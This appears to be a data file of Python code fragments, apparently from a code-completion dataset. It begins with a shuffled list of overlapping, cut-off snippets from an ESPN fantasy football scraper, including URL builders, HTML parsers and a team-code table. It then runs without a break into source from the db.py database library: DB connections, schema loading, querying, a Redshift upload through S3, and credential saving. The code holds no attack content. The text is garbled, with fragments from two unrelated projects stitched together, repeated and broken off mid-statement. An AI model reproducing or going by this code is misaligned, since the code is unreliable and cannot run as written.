Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\"", "raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params =", "= BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes =", "self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for football stats \"\"\" def __init__(self):", "of dict \"\"\" # TODO: adapt for kicker results = [] headers =", "# https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\":", "\"\"\" import logging import re from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref", "return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets page with", "360, \"te\": 160, \"dst\": 0, \"k\": 40} if pos not in slot_categories.keys(): raise", "players.append(player) elif pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player =", "= Parser() def adp(self, season_year): \"\"\" Gets season ADP data Args: season_year(int): 2018,", "vals def projections(self, content, pos): \"\"\" Parses ESPN fantasy football season-long sortable projections", "rb, wr, te, k, etc. 
Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos),", "poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = {", "of dict \"\"\" vals = [] for item in content[\"players\"]: tl_wanted = [", "\"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]:", "self._s = Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p = Parser() def", "cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str):", "\"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of NFL", "\"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in", "\"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player =", "in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if", "source players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either", "<td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if", "if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"]", "= child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses", "Scrape ESPN.com 
for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos", "pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year):", "player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod def players_position(content, pos): \"\"\"", "url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets", "one column so have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else:", "of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in", "match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to list players.append(player) return", "ADP data Args: season_year(int): 2018, 2019, etc. Returns: list: of dict \"\"\" content", "\"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type", "RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5:", "!= 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player)", "def projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets page with projections by position", "\"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\",", "attempts/completions in one column so have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text)", "player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring", "ESPN.com Args: team_code: str 'DEN', 'BUF', etc. 
Returns: HTML string \"\"\" url =", "\"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\",", "return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp", "\"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in", "1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7:", "= ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\" Gets page", "headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\",", "= tds[2].text # add to list players.append(player) return players @staticmethod def team_roster(content): \"\"\"", "players @staticmethod def players_position(content, pos): \"\"\" Parses page of ESPN players by position", "= link.attrs.get(\"playerid\") # loop through stats # they have attempts/completions in one column", "return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst Args:", "JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos):", "= child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page", "\"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\",", "rb, wr, te, k, etc. 
season_year: int 2017, 2016 week: int 1, 2,", "logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name) if parser: self._p", "\"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\",", "\"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\",", "\"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\"", "position Args: pos: str qb, rb, wr, te, k, etc. season_year: int 2017,", "soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank", "= list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] =", "[] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\",", "self._s = scraper else: self._s = Scraper(cache_name=cache_name) if parser: self._p = parser else:", "k, etc. season_year: int 2017, 2016 week: int 1, 2, 3 offset: int", "players from ESPN.com Args: team_code: str 'DEN', 'BUF', etc. Returns: HTML string \"\"\"", "and uppercase Args: pos(str): Returns: str \"\"\" if pos in [ \"qb\", \"rb\",", "from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper import", "re from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper", "\"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\":" ]
[ "s3_bucket=None): \"\"\" Upload a dataframe to redshift via s3. Parameters ---------- name: str", "= True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\"", "and rendered using handlebars. union: bool Whether or not \"UNION ALL\" handlebars templates.", "chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket)", "self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type", "HAS_ODBC = True except ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL =", "Please ensure it is installed\") if s3 is not None: AWS_ACCESS_KEY = s3.access_key", "\"\"\" if isinstance(data_type, str): data_type = [data_type] cols = [] for table in", "name) else: f = os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except: raise", "table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into", "dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is None: if", "argument is a prefix, so it'll pick up # all of the data*.gz", "} def find_table(self, search): \"\"\" Aggresively search through your database's schema for a", "load_from_json, dump_to_json from .query_templates import query_templates # attempt to import the relevant database", "for a column. 
Parameters ----------- search: str glob pattern for what you're looking", "table_meta = {} # pull out column metadata for all tables as list", "| | Album | ArtistId | INTEGER | | Artist | ArtistId |", "\"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\":", "Put The Finger On You 1 1 6 7 Let's Get It Up", "your shiny new table df: DataFrame data frame you want to save to", "import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates # attempt to import", "raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument or as an environment variable", "self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f)", "INTEGER | | Track | TrackId | INTEGER | | Track | AlbumId", "Artist | Name | NVARCHAR(120) | | Genre | Name | NVARCHAR(120) |", "as list of tuples if told to use cached metadata if use_cache and", "prefixed w/ tmp >>> results = db.find_table(\"prod_*\") # returns all tables prefixed w/", "self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def", "Customer | CustomerId | INTEGER | | Employee | EmployeeId | INTEGER |", "tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache):", "this is None, the function will try and grab AWS_ACCESS_KEY from your environment", "Parameters ----------- search: str glob pattern for what you're looking for data_type: str,", "str glob pattern for what you're looking for Examples ---------- >>> from db", "f)) tables = profile.pop('tables', None) if tables: profile['metadata'] = True else: 
profile['metadata'] =", "{{ . }} , ... {{/if}} ... {{/cols}} ... FROM ... Album; ...", "= self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con)", "drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\")", "in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for", "Employee | EmployeeId | INTEGER | | Genre | GenreId | INTEGER |", "the database credentials, plus the database properties to your db.py profile.\"\"\" if len(self.tables)", "pyodbc as pyo HAS_ODBC = True except ImportError: try: import pypyodbc as pyo", "= \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or '' )", "Hostname your database is running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the", "... '{{ name }}' as table_name, ... COUNT(*) as cnt ... FROM ...", "= False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError:", "gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = []", "Address that are varchars +----------+----------------+--------------+ | Table | Column Name | Type |", "Whether or not \"UNION ALL\" handlebars templates. This will return any handlebars queries", "is installed\") if s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key", "display in the foreign and reference keys. 
This is used to control the", "AWS_SECRET_KEY as either function argument or as an environment variable `AWS_SECRET_KEY`\") conn =", "= Key(bucket) k.key = '<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py') out", "credentials for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename =", "| | Invoice | InvoiceId | INTEGER | | Invoice | CustomerId |", "| Invoice | CustomerId | INTEGER | | Invoice | BillingAddress | NVARCHAR(70)", "| INTEGER | | Artist | ArtistId | INTEGER | | Customer |", ">>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -=", "table_name cnt 0 Album 347 1 Artist 275 2 Track 3503 >>> q", "lazy loaded reference to the table metadata for the DB.\"\"\" if len(self._tables) ==", "ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the foreign/ref key query by doing", "the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name))", "it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table", "try: from boto.s3.connection import S3Connection from boto.s3.key import Key from boto.s3.connection import Location", "profile from your config \"\"\" user = os.path.expanduser(\"~\") if s3: f = os.path.join(user,", "= port self.filename = filename self.dbname = dbname self.dbtype = dbtype self.schemas =", "table and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name", "os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise", "the DB.query method. 
You can override it by adding limit={X} to the `query`", "dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\",", "6713451 0.99 6 7636561 0.99 7 6852860 0.99 8 6599424 0.99 9 8611245", "all of the database profiles available Examples -------- No doctest, covered by unittest", "self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables", "redshift cluster's region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available", "in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self,", "1 2 Balls to the Wall 2 2 3 Restless and Wild 2", "self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\")", "we're # lazily importing boto only if necessary here. if bucket_location is None:", "keys. This is used to control the rendering of PrettyTable a bit. None", "\"system\" tables (the ones that the database needs in order to operate). This", "\"UNION ALL\" handlebars templates. This will return any handlebars queries as a single", "| Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns", "# tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete()", "pyodbc or pymssql libraries. 
Please ensure one of them is installed\") if HAS_ODBC:", "list of tuples, to match how normal loading is performed for col in", "= True except ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL = True", "installed\") creds = {} for arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if", "INTEGER | | Invoice | CustomerId | INTEGER | | InvoiceLine | TrackId", "key relationships # 3. use the naive approach if use_cache: # generate our", "is None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port = 5439 elif", "def _apply_handlebars(self, q, data, union=True): if (sys.version_info < (3, 0)): q = unicode(q)", "\\ 0 1 For Those About To Rock (We Salute You) 1 1", "Parameters ---------- profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") \"\"\"", "hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except", "find for table and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp", "11170334 0.99 1 5510424 0.99 2 3990994 0.99 3 4331779 0.99 4 6290521", "= pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL Server\",", "{name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY,", "Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending", "varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row))", "Fast As a Shark 0.99 3 Restless and Wild 0.99 4 Princess of", 
"self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure", "sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down", "q, limit=1000): # postgres, mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\",", "not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database as credentials", "= value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not", "Restless and Wild 0.99 4 Princess of the Dawn 0.99 5 Put The", "one time, database-wide, if query is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db',", "creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database", "to the Wall 0.99 2 Fast As a Shark 0.99 3 Restless and", "things like schema definitions. Most of you probably don't need this, but if", "temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert", "elif dbtype==\"mssql\": port = 1433 elif profile is not None: pass else: raise", "filename self.dbname = dbname self.dbtype = dbtype self.schemas = schemas self.limit = limit", "exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return", "collections import defaultdict import pandas as pd import pybars from .column import Column,", "sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here. 
the s3 argument", "return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite if self.dbtype", "Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For Those About To Rock", "HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure it is installed\")", "handlebars templates. This will return any handlebars queries as a single data frame.", "pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL = False try: import sqlite3 as", "save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so you don't have to save", "= self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all of the database", "self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql", "you can use an S3 object print_sql: bool (False) option for printing sql", "name) try: try: open(f) except: raise Exception(\"Profile '{0}' does not exist. Could not", "ImportError: HAS_SQLITE = False try: import pyodbc as pyo HAS_ODBC = True except", "wide columns in some cases. driver: str, None Driver for mssql/pyodbc connections. Examples", "| MediaTypeId | INTEGER | | Playlist | PlaylistId | INTEGER | |", "name) # defaults to using SQLite format. need to convert it to Postgres", "import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db", "= getattr(self, arg) if arg==\"username\": arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\"", "from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1 For Those About", "{{/cols}} ... FROM ... Album; ... ''' >>> data = {\"cols\": [\"AlbumId\", \"Title\",", "\".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and querying a database. 
Parameters ----------", "1 1 2 Balls to the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds", "Track 3503 >>> q = ''' ... SELECT ... {{#cols}} ... {{#if @last}}", "\"select * from ({q}) q limit {limit}\".format(q=q, limit=limit) return q # mssql else:", "import StringIO # Python 2.7 except: from io import StringIO # Python 3.3+", "database from a file. Parameters ---------- filename: str A SQL script data: list,", "the `query` method, or by passing an argument to `DB()`. None indicates that", "query] if union==True: query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data,", "self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype,", "0.99 9 8611245 0.99 >>> q = ''' ... SELECT ... a.Title, ...", "a single query for getting all key relationships # 3. use the naive", "in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified']", "MediaTypeId \\ 0 1 For Those About To Rock (We Salute You) 1", "will be passed to the template and rendered using handlebars. union: bool Whether", "will be no limit (That's right, you'll be limitless. Bradley Cooper style.) 
keys_per_column:", "them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'],", "u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {} user", "the database profiles available Examples -------- No doctest, covered by unittest list_profiles() {'demo':", "bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear", "| PlaylistTrack | PlaylistId | INTEGER | | Track | TrackId | INTEGER", "# returns all columns containing Address that are varchars +----------+----------------+--------------+ | Table |", "node, so if running 2 nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY:", "from .column import Column, ColumnSet from .table import Table, TableSet from .s3 import", "select one of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if", "pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username,", "if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column", "a prefix, so it'll pick up # all of the data*.gz files we've", "INTEGER | | Employee | EmployeeId | INTEGER | | Employee | Address", "table_name ... ''' >>> data = [ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"},", "col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. 
Please wait...\") if self.schemas is not None", "= \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and querying", "Column Name | Type | +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) |", "2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619 3 1 <NAME>,", "db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") #", "to save to the db drop_if_exists: bool (False) whether you'd like to drop", "elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname", "This is not to say this a secure way to store sensitive data,", "self.hostname = hostname self.port = port self.filename = filename self.dbname = dbname self.dbtype", "| InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId | INTEGER", "for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format as list", "= self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\"", "in the same order, making doctest fail. db.find_column(\"Name\") # returns all columns named", "to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload", "\"\"\" Upload a dataframe to redshift via s3. 
Parameters ---------- name: str name", "Balls to the Wall 0.99 2 Fast As a Shark 0.99 3 Restless", "ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\":", "= os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except: raise Exception(\"Profile '{0}' does", "q # mssql else: if limit: q = \"select top {limit} * from", "-= if not, there's always a random issue where rows are not in", "= DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1", "an instance of DB that hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/", "keys, you can use an S3 object print_sql: bool (False) option for printing", "About To Rock We Salute You 8 For Those About To Rock We", "arg = \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] = value self.con =", "pull out column metadata for all tables as list of tuples if told", "io import StringIO # Python 3.3+ import uuid import re import os import", "= conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going", "# returns all columns named \"Name\" +-----------+-------------+---------------+ | Table | Column Name |", "creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename')", "search through your database's schema for a column. 
Parameters ----------- search: str glob", "varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql", "from boto.s3.key import Key from boto.s3.connection import Location # if boto is present,", "| | Customer | CustomerId | INTEGER | | Employee | EmployeeId |", "| Artist | ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns", "if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not", "AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down", "and looks for any new tables and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables,", "# TODO: maybe add warnings? try: import psycopg2 as pg HAS_PG = True", "| INTEGER | | Employee | ReportsTo | INTEGER | | Employee |", "self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. Please ensure", "INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+ | Table", "for table in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type", "union=False) AlbumId Title ArtistId 0 1 For Those About To Rock We Salute", "\"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here. 
the s3 argument is a", "| +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp", "\"\"\" tables = [] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return", "1 1 2 Balls to the Wall 2 2 3 Restless and Wild", "port is None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port = 5439", "\"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con", "and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in self._metadata_cache: # table", "the system tables. limit: int, None Default number of records to return in", "db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+ |", "if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname", "# join all threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql", "f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 